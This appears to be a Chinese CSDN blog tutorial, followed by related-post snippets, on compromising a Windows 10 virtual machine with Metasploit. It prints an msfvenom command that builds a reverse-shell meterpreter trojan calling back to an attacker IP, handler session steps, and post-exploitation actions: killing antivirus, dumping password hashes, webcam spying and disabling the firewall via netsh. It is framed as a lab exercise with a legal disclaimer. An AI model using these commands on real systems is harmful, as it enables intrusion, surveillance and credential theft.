2021-05-07 使用metasploit(MSF) 和 木马 入侵win10 虚拟机

已于 2023-02-07 21:19:38 修改
阅读量1.4k 收藏 30
点赞数 1
文章标签: kali linux metasploit 安全
于 2021-05-07 08:05:19 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/White_give_boy/article/details/116477691
版权

本文章仅限学习,切勿违法乱用

注意:本次实验仅可在自己电脑,且断开网络的情况下进行,不可入侵他人电脑,千万注意要遵纪守法

使用metasploit(MSF) 和 木马 入侵win10 虚拟机

0x01 实验环境

 攻击机:kali linux 

 ip:192.168.171.128

 目标机:windows 10 家庭普通版(虚拟机)

 ip:物理主机

0x02配置msf

1.开启数据库服务 service postgresql start

2.初始化数据库 msfdb init

3.进入msf

4.

加载模块,显示参数

5.

修改参数

LHOST为攻击机ip,LPORT为监听端口

6.开始监听

0x03 木马

1.生成木马(LHOST为攻击机ip,LPORT为监听端口)

─(root💀kali)-[/home/kali]

└─# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.171.128 LPORT=1234 -f exe -o win7-1.exe

2.将木马复制到win10(虚拟机)电脑上

0x04 入侵

打开木马程序

攻击机收到数据

msf exploit(handler) > sessions(查看上钩的用户)

msf exploit(handler) > sessions -i 1(选择需要攻击的用户,这里选择第 1 个)

进入meterpreter了,即可进行一些相关的木马操作

0x05 入侵成功 进行操作

执行杀死杀毒软件进程操作

获取目标主机用户的哈希值(需要先获得管理员权限,输入getsystem获得,输入getuid获得当前权限)

获取实时屏幕

开启摄像头,并监控

远程关闭防火墙

netsh advfirewall set allprofiles state off

效果如下:

输入shell

进入shell界面

echo hello who are you? > 1.txt   echo + 内容  > 文档名

type +文件名 打开文档

出现乱码时,输入 chcp 65001

White give boy
关注
  • 1
    点赞
  • 30
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
ProxyLogon-CVE-2021-26855-metasploit:CVE-2021-26855 proxyLogon metasploit利用脚本
03-17
ProxyLogon-CVE-2021-26855-metasploit CVE-2021-26855 proxyLogon metasploit利用脚本
Kali使用Metapsloit渗透win10 生成 payload 反弹shell
weixin_45908624的博客
07-19 2414
windows payload 反弹shell
msf win10系统攻击
WEB渗透测试 从入门到萌新
10-02 4765
win10系统攻击msf
【kail】使用Metasploit 渗透Windows10
爪白白的个人博客
12-14 6975
一、在Kali Linux中生成被控端(msfvenom命令) 第一步:下面我们用msfvenom命令使用反向远程控制程序“windows/meterpreter/reverse_tcp”。该软件执行时自动连接IP“192.168.43.77”,连接的端口为“5000”,生成的文件为payload.exe,在/root目录下 msfvenom -p windows/meterpreter/re...
通过msf渗透win10
qq_63651088的博客
03-22 1612
提前将kali设置成桥接模式,与win10在同一个网段下。将payload.exe文件发送至win10下。还有更多利用方式,可自行探索。
Kali Linux-Metasploit入侵Windows10系统
冷色调的夏天的博客
08-01 3万+
Kali Linux-Metasploit入侵Windows10 写在前文 距离上一次写KALI黑客攻防的博文已是去年这个时候了 之所以再次动手写这类的文章一是因为兴趣,二是看到网上五花八门的文章都是复制粘贴过来的,而且并没有写的很清楚,因此就有了本篇博客的出现 免责声明 切勿根据本文做违法之事,如做违法之事皆于博主本人无关! 实验环境 以下环境可以是两台真实物理机,也可以是一台物理机安装虚拟机 上述两种情况我均已尝试成功,由于在一台电脑上写博文较为方便 因此之后的截图是在一台物理机上的。 KALI:(攻
CVE-2021-21972:CVE-2021-21972 VMware vCenter metasploit利用脚本中的未经授权的RCE
03-08
CVE-2021-21972 VMware vCenter metasploit利用脚本中的未经授权的RCE 准备 git clone https://github.com/TaroballzChen/CVE-2021-21972 cd CVE-2021-21972 mkdir -p ~ /.msf4/modules/exploits/multi/http cp * ~...
metasploitframework-win-x64
10-05
Metasploit Framework 作为一个缓冲区溢出测试使用的辅助工具,也可以说是一个漏洞利用和测试平台。它集成了各平台上常见的溢出漏洞和流行的shellcode,并且不断更新,使得缓冲区溢出测试变得方便和简单。 使用...
Metasploit简单利用及入侵Windows7案例.docx
11-13
### Metasploit简单利用及入侵Windows7案例 #### 一、MS17_010漏洞利用实验 ##### 1. 发起漏洞探测 - **背景介绍**:本实验选择了MS17_010(永恒之蓝)漏洞进行攻击尝试。此漏洞允许攻击者在未打补丁的Windows...
python-sploitkit:用于构建类似Metasploit的控制台的Devkit
05-14
介绍该工具包旨在以类似于Metasploit的样式轻松构建框架控制台。 它提供了一个全面的界面来为其存储数据库定义CLI命令,模块和模型。设置pip install sploitkit用法从这一点来看, main.py具有以下代码: #!/usr/bin...
Metasploit超详细安装及使用教程(图文版)
hack0919的博客
05-27 5131
本文主要以Kali Linux为主。因为Kali Linux预装了 Metasploit框架和运行在框架上的其他第三方工具
metasploit(永恒之蓝 2017 第10号漏洞)攻击windows操作系统
weixin_73592765的博客
08-02 254
( payload是攻击载荷,就是攻击后的行动,这里是想获取meterpreter)(meterpreter是metaspoit后渗透神器)set LPORT 12345(LPORT为listen port,代表在kaili上即将开启的端口,1-65535随便选,但不能被占用)set LHOST 192.168.1.136(LHOSTS是listen host,是kali的IP地址)使用sudo su命令,并输入kali的密码kali,切换至root用户。使用模块->配置模块必选项 ->运行模块。
msf利用web_delivery模块 攻击windows实例
cuteyann的博客
05-15 651
目标机存在命令注入漏洞,使用web_delivery模块生成的一条命令建立连接,并且不会在目标主机磁盘写文件,留下文件信息。7、在复制的命令前添加127.0.0.1 && (因为&&命令执行),然后在dvwa命令注入靶场中提交。这里使用比较老的python做webshell就可以了,输入命令:set target 0。(在目标机的cmd也可执行,前提是目标机已经安装了python)8、查看session,然后连接,就可用对目标机进行操作啦。红框里就是生成的命令,把它复制下来。6、运行,输入命令:run。
Kali MSF攻击Win10
最新发布
nlj1860453的博客
01-05 1250
如果没有问题,它会打开监听,现在我们在Windows上运行木马文件,Windows如果没有任何反应,只是鼠标转圈圈,MSF输出了“meterpreter>“字样的时候,攻击就成功了!运行后就可以看到此路径下有一个叫“shell.exe”的可执行文件,把他拖到Windows上(实际情况是我爸的电脑,可以使用社会工程学上传上去),这一步就大功告成了!我Windows的IP是192.168.1.1*,我kali的IP是192.168.1.*。如果你的虚拟机是VM虚拟机,那么你下载VM图标的,其它虚拟机以此类推。
Kali渗透Windows服务器
yy1715713348的博客
07-31 976
本实验通过利用kali进行漏洞扫描,使用Metasploit对目标主机进行渗透测试,并根据报告做出相应的防护措施,共分为3个实验步骤,详情如下;1、 实战步骤一:生成setup.exe后门程序,即木马程序。(1) 打开kali终端,输入ifconfig, 得到本机ip为192.168.189.130。如下图:(2)输入以下命令,使用msfpayload生成名为setup的后门程序:如下图:(3) 进入setup.exe所在目录,修改属性:选择“允许以程序执行文件”。
【2023最新版】超详细Metasploit安装保姆级教程,Metasploit渗透测试使用,看完这一篇就够了
wangluoanquan111的博客
07-11 336
如果你对网络安全入门感兴趣,那么你需要的话可以点击这里👉网络安全重磅福利:入门&进阶全套282G学习资源包免费分享!
入侵win10(下)--渗透系统
systemino的博客
05-25 4100
攻击者在远程私有服务器上配置完metasploit,创建了自动化资源脚本和生成了简单地payload之后,只要能够物理接触他人的电脑几分钟,他就可以远程控制别人的电脑了,即使电脑已关机也无济于事。 如果你还不太明白,请务必参考我的上一篇文章:设置live USB和payload USB。不然,你可能会有些蒙圈,不知道我下面会说到的两个USB从何而来。 完成上一篇文章中的一系列操作之后,这篇文章...
kali攻击命令大全_利用msf攻击win10
weixin_35513543的博客
11-27 1万+
攻击环境:攻击者系统:虚拟机kali linux靶机系统:win10(需要打开Easy File Sharing服务)攻击者ip:10.3.134.27靶机ip:10.3.37.56攻击者和靶机在同一个wifi下,保证在同一网段里,能互相ping通。漏洞利用:EsayFileSharing注意点: 攻击者的虚拟机网络模式应选择桥接模式。准备工作完成,可以开始内网渗透之旅了。step-1首先我们先...
Kali Linux渗透测试--windows 10入侵和提权过程
热门推荐
无崖子的博客
08-21 3万+
在进行入侵检测之前,配置好网络环境,使其相互连通,才能进行入侵。在使用Metasploit成功入侵之后拿到的只是一个基础的shell,要想拿到系统级别的shell,添加系统用户,获取用户登录口令,还需要进一步提权。 一、Metasploit对windows 10入侵测试 环境
metasploit 木马 win10
08-12
Metasploit是一款功能强大的渗透测试工具,可以用于创建和管理各种类型的恶意软件,包括木马。对于在Windows 10系统上使用Metasploit创建木马,您可以使用msfvenom来生成适用于Windows 10的恶意软件。 例如,您可以使用以下命令来生成一个适用于Windows 10系统的反向TCP木马msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.171.128 LPORT=1234 -f exe -o win10-1.exe 这个命令将生成一个名为win10-1.exe的可执行文件,其中包含一个反向TCP木马。通过将此木马传递给目标系统,并确保您的监听器配置正确,您可以在目标系统上建立一个与Metasploit的反向连接,以便执行各种操作,如查看目标的桌面、监听麦克风、打开摄像头等。请注意,创建和使用恶意软件可能是非法的,只能在合法的渗透测试或授权的安全测试中使用。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *2* [6. MetasploitMetasploit木马](https://blog.csdn.net/qq_41860876/article/details/105627201)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT0_1"}}] [.reference_item style="max-width: 50%"] - *3* [2021-05-07 使用metasploit(MSF) 和 木马 入侵win10 虚拟机](https://blog.csdn.net/White_give_boy/article/details/116477691)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT0_1"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值